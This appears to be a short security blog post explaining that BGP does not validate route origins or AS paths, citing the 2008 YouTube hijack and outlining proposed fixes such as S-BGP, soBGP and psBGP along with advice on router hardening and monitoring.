By default, BGP does not take care of integrity and origin of the received messages. It does not validate the routing announces made by AS nor the AS path. Except the “Chinese” issue reported a few days ago, such attacks are rare! But mis-configurations occur and have exactly the same impact. Often they have as origin small Internet providers which don’t have lot of experience (human errors). A well-known example is the one of the Pakistani ISP which hijacked Youtube in 2008!

How to avoid those problems? Well, there are interesting projects like Secure BGP (or “S-BGP“). S-BGP increase the lack of security by implementing new controls:

  • The BGP components (IP prefixes, AS, routers and owners) are linked to a PKI infrastructure to authenticate them.
  • Digital signatures are exchanged during BGP updates.
  • IPsec is used between peers.

It looks nice but not easy to implement. Do the smallest ISP’s have time and internal resources to implement this? There are two others proposals: Secure Origin BGP (“soBGP“), based on public/private keys infrastructure, and Pretty Secure BGP (“psBGP”).

And don’t forget the core routers security. Routers are like any computer: they run an operating system, they are managed remotely by network teams and contain sensitive data. They must be properly protected. Even in a secure BGP deployment, if your router is pwned, it could be used to send bogus BGP announces to your peers!

If you’re interested in following BGP networks and issues, I recommend you the site bgpmon.net. Very useful if you maintain your own AS or if you’d like to follow the one of your Internet provider (always useful). BGP mis-configurations are a common issue today. To give you an idea, check out the bogon prefixes announced on the Internet! (bogon prefixes – like RFC1918 – must never be announced on the Internet).

Related sources:

Posted in: ISP, Net, Security | Tagged: , ,